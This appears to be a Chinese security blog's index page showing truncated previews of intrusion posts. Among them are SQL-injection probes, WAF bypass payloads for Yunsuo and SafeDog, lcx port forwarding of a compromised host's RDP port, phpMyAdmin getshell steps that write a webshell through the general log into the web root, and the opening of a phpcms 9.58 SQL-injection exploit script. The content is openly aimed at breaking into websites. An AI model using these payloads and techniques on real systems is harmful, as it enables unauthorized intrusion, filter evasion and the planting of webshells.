如何判断网站和数据库是否站库分离最新

判断网站和数据库是否站库分离今天来讲是利用sql注入点来判断 在注入点后加上: and exists(select * from admin where 1=(Select (case when host_name()=@@servername then 1 else 0 end))) 注意: admin一定要是存在的表段,如果返回正常,说明网站和数据库是在同一服务器,如果不正常则说明是站库分离的
阅读全文

过云锁注入技巧最新

环境 win03 + apache + php + 云锁最新版win_3.1.6 绕过 第一种方法就不多说了,网上很早就出来了,检测post后忽略get,从而被绕过。 这里主要介绍下如何绕过正则。 先贴payload: https://www.xxxx.com/test.php?id=2%27/*!40000/*!30000union*/DISTINCTROW select 1,2,3– - https://www.xxxx.com/test.p...
阅读全文

文件包含漏洞

文件包含漏洞
什么是文件包含漏洞 服务器通过php的特性(函数)去包含任意文件时,由于要包含的这个文件来源过滤不严,从而可以去包含一个恶意文件,而我们可以构造这个恶意文件来达到邪恶的目的。 为什么存在文件包含漏洞 一般来说,程序员开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数是,直接调用此文件,而无须再次编写,这种调用文件的过程一般称为包含。 很多人会问,为什么呢,因为开发人员都喜欢重复的代码可以不用重复写,直接调用某个函数或某个文件里面的代码,这就大大缩...
阅读全文

内网转发姿势

一、lcx 的使用 1. 肉鸡上执行:lcx.exe –slave 公网 ip + 端口  肉鸡 ip + 端口 例如:lcx.exe -slave xxx.xxx.xxx.xxx 10000 127.0.0.1 3389 意思是把肉鸡的 3389 端口转发到 xxx.xxx.xxx.xxx 公网的 10000 端口 2. 公网 ip 机器上执行 Lcx.exe –listen 10000 10001 例如:Lcx.exe –listen 10001 1000...
阅读全文

phpmyadmin getshell思路

phpmyadmin getshell思路
1.开启SQL日志功能 SET global general_log="ON"; 2.设置日志文件地址,这个地址需要设置网站目录里的地址,因为要获取权限得通过容器解释代码才行,而网站目录地址则可以通过探针获得 SET global general_log_file='D:/phpStudy/WWW/shell.php'; 3.向日志文件提交一句话木马,因为SQL日志文件会记录SQL的所有操作,而且不会转义,所以直接能写一句话木马到日志里面去 ...
阅读全文

Fuzz_SafeDog

Fuzz_SafeDog
#!/usr/bin/env python # -*- coding:utf-8 -*- """ @author;TTK7 @tile; fuzz_safedog.py @time; 2018/4/17 20:15 """ import requests import sys fuzz_zs = ['/*','*/','/*!','/**','?&...
阅读全文

SQL注入绕过技巧

SQL注入绕过技巧
1.绕过空格(注释符/* */,%a0): 两个空格代替一个空格,用Tab代替空格,%a0=空格: %20 %09 %0a %0b %0c %0d %a0 %00 /**/ /*!*/   最基本的绕过方法,用注释替换空格: /* 注释 */ 使用浮点数: select * from users where id=8E0union select 1,2,3 select * from users where...
阅读全文

递归子域名扫描器

递归子域名扫描器
""" @author;TTK7 @tile; phpcms958 sql.py @time; 2018/4/15 1:18 """ import requests import re import chardet from termcolor import cprint requests.packages.urllib3.disable_warnings() class TSubdomin: def __init__(sel...
阅读全文

phpcms 9.58 sql注入exp

phpcms 9.58 sql注入exp
#!/usr/bin/env python # -*- coding:utf-8 -*- """ @author;TTK7 @tile; phpcms958 sql.py @time; 2018/4/9 20:16 """ import requests from urllib.parse import quote url = 'http://192.168.56.131'#攻击的目标地址 payload = &q...
阅读全文